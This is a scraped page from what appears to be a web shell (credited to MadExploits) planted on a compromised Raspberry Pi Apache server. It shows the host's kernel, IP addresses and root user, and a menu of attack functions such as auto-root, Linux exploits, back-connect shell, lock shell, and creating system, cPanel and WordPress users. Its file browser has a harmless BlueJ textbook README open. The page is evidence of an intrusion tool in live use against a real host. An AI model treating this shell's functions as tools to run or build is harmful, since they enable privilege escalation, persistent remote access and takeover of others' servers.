Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
BlueJ /
picture /
[ HOME SHELL ]
Name
Size
Permission
Action
Canvas.java
7.04
KB
-rw-r--r--
Circle.java
3.63
KB
-rw-r--r--
Picture.java
2.1
KB
-rw-r--r--
README.TXT
1.51
KB
-rw-r--r--
Square.java
3.57
KB
-rw-r--r--
Triangle.java
3.83
KB
-rw-r--r--
package.bluej
1.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.TXT
Project "picture" Authors: Michael Kölling and David J. Barnes This project is part of the material for the book Objects First with Java - A Practical Introduction using BlueJ David J. Barnes and Michael Kolling Pearson Education, 2002 It is discussed in chapter 1. This is a very simple project to demonstrate some characteristics of objects. You can create various shapes, and you will see, if you do, that those shapes are drawn on screen (in a window that we call the "canvas"). You can then manipulate these objects: change their position, size and colour. Try it out: create a few different squares, triangles and circles. This project is designed as a first example of object-oriented programming. It illustrates a number of concepts: - a Java project (application) is a collection of classes - objects can be created from classes - from any one class, many objects may be created - objects have operations (methods) - operations can have parameters - parameters have types (at least String and int) - objects hold data (fields) - the operations and fields are common to all objects - the values stored in the fields can be different for each object The project also demonstrates - BlueJ object creation - interactive method invocation - parameter passing A good second project to look at after this is "picture", which adds a class to those ones in this project. That class (named "Picture") uses the shapes to draw a picture. It can be used to experiment with coding. Michael Kölling, July 2000
Close